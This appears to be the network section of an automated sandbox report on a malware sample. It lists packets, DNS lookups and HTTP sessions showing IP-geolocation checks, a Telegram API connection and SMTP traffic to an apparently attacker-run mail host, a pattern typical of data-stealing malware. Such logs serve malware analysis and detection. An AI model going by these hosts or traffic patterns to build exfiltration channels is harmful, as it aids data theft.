Jan 11, 2025 02:42:15.689549923 CET	49707	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.689599991 CET	443	49707	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:15.827788115 CET	443	49707	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:15.827855110 CET	443	49707	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:15.827903032 CET	49707	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.828536034 CET	49707	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:15.833569050 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:15.834575891 CET	49708	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:15.838762045 CET	80	49705	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:15.838824987 CET	49705	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:15.839489937 CET	80	49708	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:15.839567900 CET	49708	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:15.839740992 CET	49708	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:15.844561100 CET	80	49708	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:16.653378010 CET	80	49708	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:16.655152082 CET	49709	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:16.655188084 CET	443	49709	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:16.655296087 CET	49709	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:16.655625105 CET	49709	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:16.655636072 CET	443	49709	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:16.694443941 CET	49708	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:17.126054049 CET	443	49709	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:17.127633095 CET	49709	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:17.127682924 CET	443	49709	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:17.293625116 CET	443	49709	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:17.293682098 CET	443	49709	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:17.293757915 CET	49709	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:17.294662952 CET	49709	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:17.301263094 CET	49708	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:17.303333044 CET	49710	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:17.306468010 CET	80	49708	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:17.306531906 CET	49708	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:17.308198929 CET	80	49710	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:17.308758974 CET	49710	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:17.315608978 CET	49710	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:17.320487976 CET	80	49710	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:19.790730953 CET	80	49710	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:19.827326059 CET	49710	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:19.828531981 CET	49711	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:19.832309008 CET	80	49710	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:19.833283901 CET	49710	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:19.833457947 CET	80	49711	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:19.833528042 CET	49711	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:19.833647013 CET	49711	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:19.838366032 CET	80	49711	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:20.415277004 CET	80	49711	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:20.426810980 CET	49712	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:20.426846027 CET	443	49712	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:20.426955938 CET	49712	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:20.427258015 CET	49712	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:20.427274942 CET	443	49712	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:20.460225105 CET	49711	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:20.888418913 CET	443	49712	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:20.890371084 CET	49712	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:20.890398026 CET	443	49712	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:21.038113117 CET	443	49712	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:21.038162947 CET	443	49712	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:21.038213015 CET	49712	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:21.038853884 CET	49712	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:21.042359114 CET	49711	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:21.043601036 CET	49713	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:21.047846079 CET	80	49711	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:21.047905922 CET	49711	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:21.048917055 CET	80	49713	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:21.048985004 CET	49713	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:21.049113989 CET	49713	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:21.054342031 CET	80	49713	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:23.416625023 CET	80	49713	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:23.418081999 CET	49714	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:23.418126106 CET	443	49714	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:23.418198109 CET	49714	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:23.418649912 CET	49714	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:23.418667078 CET	443	49714	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:23.460062981 CET	49713	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:23.871000051 CET	443	49714	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:23.872814894 CET	49714	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:23.872844934 CET	443	49714	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:24.007802010 CET	443	49714	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:24.007862091 CET	443	49714	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:24.008035898 CET	49714	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:24.008395910 CET	49714	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:24.011874914 CET	49713	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:24.013068914 CET	49715	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:24.016880989 CET	80	49713	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:24.016947031 CET	49713	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:24.017818928 CET	80	49715	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:24.017889023 CET	49715	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:24.017988920 CET	49715	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:24.022831917 CET	80	49715	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:25.681204081 CET	80	49715	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:25.683053970 CET	49716	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:25.683125019 CET	443	49716	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:25.683357000 CET	49716	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:25.683741093 CET	49716	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:25.683753014 CET	443	49716	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:25.725817919 CET	49715	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:26.164889097 CET	443	49716	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:26.166584969 CET	49716	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:26.166604996 CET	443	49716	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:26.308154106 CET	443	49716	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:26.308219910 CET	443	49716	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:26.308490038 CET	49716	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:26.308783054 CET	49716	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:26.320663929 CET	49717	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:26.325429916 CET	80	49717	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:26.325505018 CET	49717	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:26.325613976 CET	49717	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:26.330369949 CET	80	49717	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:28.056293964 CET	80	49717	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:28.057568073 CET	49720	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:28.057615995 CET	443	49720	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:28.057691097 CET	49720	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:28.058079958 CET	49720	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:28.058090925 CET	443	49720	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:28.096697092 CET	49717	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:28.519728899 CET	443	49720	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:28.528049946 CET	49720	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:28.528084040 CET	443	49720	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:28.670408010 CET	443	49720	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:28.670483112 CET	443	49720	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:28.670545101 CET	49720	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:28.671088934 CET	49720	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:28.674591064 CET	49717	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:28.675755024 CET	49723	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:28.679728985 CET	80	49717	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:28.679826975 CET	49717	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:28.680680037 CET	80	49723	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:28.680749893 CET	49723	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:28.680855036 CET	49723	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:28.685714006 CET	80	49723	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:29.892575979 CET	80	49723	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:29.894035101 CET	49724	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:29.894076109 CET	443	49724	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:29.894191027 CET	49724	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:29.894546032 CET	49724	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:29.894563913 CET	443	49724	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:29.944442034 CET	49723	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:30.347191095 CET	443	49724	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:30.348902941 CET	49724	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:30.348922968 CET	443	49724	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:30.491692066 CET	443	49724	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:30.491753101 CET	443	49724	104.21.112.1	192.168.2.8
Jan 11, 2025 02:42:30.492068052 CET	49724	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:30.492367983 CET	49724	443	192.168.2.8	104.21.112.1
Jan 11, 2025 02:42:30.514924049 CET	49723	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:30.520138025 CET	80	49723	193.122.130.0	192.168.2.8
Jan 11, 2025 02:42:30.520194054 CET	49723	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:30.523298025 CET	49725	443	192.168.2.8	149.154.167.220
Jan 11, 2025 02:42:30.523354053 CET	443	49725	149.154.167.220	192.168.2.8
Jan 11, 2025 02:42:30.523637056 CET	49725	443	192.168.2.8	149.154.167.220
Jan 11, 2025 02:42:30.524005890 CET	49725	443	192.168.2.8	149.154.167.220
Jan 11, 2025 02:42:30.524022102 CET	443	49725	149.154.167.220	192.168.2.8
Jan 11, 2025 02:42:31.156088114 CET	443	49725	149.154.167.220	192.168.2.8
Jan 11, 2025 02:42:31.156177044 CET	49725	443	192.168.2.8	149.154.167.220
Jan 11, 2025 02:42:31.160326958 CET	49725	443	192.168.2.8	149.154.167.220
Jan 11, 2025 02:42:31.160340071 CET	443	49725	149.154.167.220	192.168.2.8
Jan 11, 2025 02:42:31.160600901 CET	443	49725	149.154.167.220	192.168.2.8
Jan 11, 2025 02:42:31.162067890 CET	49725	443	192.168.2.8	149.154.167.220
Jan 11, 2025 02:42:31.203335047 CET	443	49725	149.154.167.220	192.168.2.8
Jan 11, 2025 02:42:31.408513069 CET	443	49725	149.154.167.220	192.168.2.8
Jan 11, 2025 02:42:31.408674002 CET	443	49725	149.154.167.220	192.168.2.8
Jan 11, 2025 02:42:31.408754110 CET	49725	443	192.168.2.8	149.154.167.220
Jan 11, 2025 02:42:31.409231901 CET	49725	443	192.168.2.8	149.154.167.220
Jan 11, 2025 02:42:37.770059109 CET	49715	80	192.168.2.8	193.122.130.0
Jan 11, 2025 02:42:38.391187906 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:38.396008968 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:38.396119118 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.114368916 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.114581108 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.119373083 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.277342081 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.277643919 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.282458067 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.443591118 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.444308043 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.449157953 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.616483927 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.616503954 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.616528988 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.616544962 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.616558075 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.616570950 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.616602898 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.663220882 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.704909086 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.750696898 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.755494118 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.912780046 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:39.916485071 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:39.921300888 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.081598043 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.083147049 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:40.088001966 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.251844883 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.252216101 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:40.258486986 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.447415113 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.447734118 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:40.452554941 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.613441944 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.616529942 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:40.621387959 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.830467939 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.831947088 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:40.837558985 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:40.999703884 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:41.010941982 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:41.010941982 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:41.010974884 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:41.010974884 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:41.010974884 CET	49726	587	192.168.2.8	66.29.146.57
Jan 11, 2025 02:42:41.016390085 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:41.016405106 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:41.017607927 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:41.017628908 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:41.017641068 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:41.187805891 CET	587	49726	66.29.146.57	192.168.2.8
Jan 11, 2025 02:42:41.241319895 CET	49726	587	192.168.2.8	66.29.146.57

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:42:11.323160887 CET	57794	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:42:11.330111980 CET	53	57794	1.1.1.1	192.168.2.8
Jan 11, 2025 02:42:14.280656099 CET	52178	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:42:14.288136005 CET	53	52178	1.1.1.1	192.168.2.8
Jan 11, 2025 02:42:26.312864065 CET	55533	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:42:26.319436073 CET	53	55533	1.1.1.1	192.168.2.8
Jan 11, 2025 02:42:30.515773058 CET	60331	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:42:30.522483110 CET	53	60331	1.1.1.1	192.168.2.8
Jan 11, 2025 02:42:38.356148958 CET	58493	53	192.168.2.8	1.1.1.1
Jan 11, 2025 02:42:38.390290976 CET	53	58493	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 02:42:11.323160887 CET	192.168.2.8	1.1.1.1	0xce31	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:14.280656099 CET	192.168.2.8	1.1.1.1	0x23fd	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:26.312864065 CET	192.168.2.8	1.1.1.1	0xf7e2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:30.515773058 CET	192.168.2.8	1.1.1.1	0x371a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:38.356148958 CET	192.168.2.8	1.1.1.1	0x557d	Standard query (0)	mail.besemglda.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 02:42:11.330111980 CET	1.1.1.1	192.168.2.8	0xce31	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:42:11.330111980 CET	1.1.1.1	192.168.2.8	0xce31	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:11.330111980 CET	1.1.1.1	192.168.2.8	0xce31	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:11.330111980 CET	1.1.1.1	192.168.2.8	0xce31	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:11.330111980 CET	1.1.1.1	192.168.2.8	0xce31	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:11.330111980 CET	1.1.1.1	192.168.2.8	0xce31	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:14.288136005 CET	1.1.1.1	192.168.2.8	0x23fd	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:14.288136005 CET	1.1.1.1	192.168.2.8	0x23fd	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:14.288136005 CET	1.1.1.1	192.168.2.8	0x23fd	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:14.288136005 CET	1.1.1.1	192.168.2.8	0x23fd	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:14.288136005 CET	1.1.1.1	192.168.2.8	0x23fd	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:14.288136005 CET	1.1.1.1	192.168.2.8	0x23fd	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:14.288136005 CET	1.1.1.1	192.168.2.8	0x23fd	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:26.319436073 CET	1.1.1.1	192.168.2.8	0xf7e2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:42:26.319436073 CET	1.1.1.1	192.168.2.8	0xf7e2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:26.319436073 CET	1.1.1.1	192.168.2.8	0xf7e2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:26.319436073 CET	1.1.1.1	192.168.2.8	0xf7e2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:26.319436073 CET	1.1.1.1	192.168.2.8	0xf7e2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:26.319436073 CET	1.1.1.1	192.168.2.8	0xf7e2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:30.522483110 CET	1.1.1.1	192.168.2.8	0x371a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:42:38.390290976 CET	1.1.1.1	192.168.2.8	0x557d	No error (0)	mail.besemglda.com		66.29.146.57	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	193.122.130.0	80	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:42:11.356806040 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 02:42:12.706470013 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 57c5ff206ae8a4873441f0b8d3287c93 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 02:42:12.715895891 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:42:13.835150003 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 38e6d26ff7c2ba9aa9b7640c75d4492b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 02:42:15.117017031 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:42:15.223807096 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b3d002070efc2fbab6be133c4521b134 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	193.122.130.0	80	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:42:15.839740992 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 02:42:16.653378010 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cb4106d2fad5a1f7a771679b82be52fc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
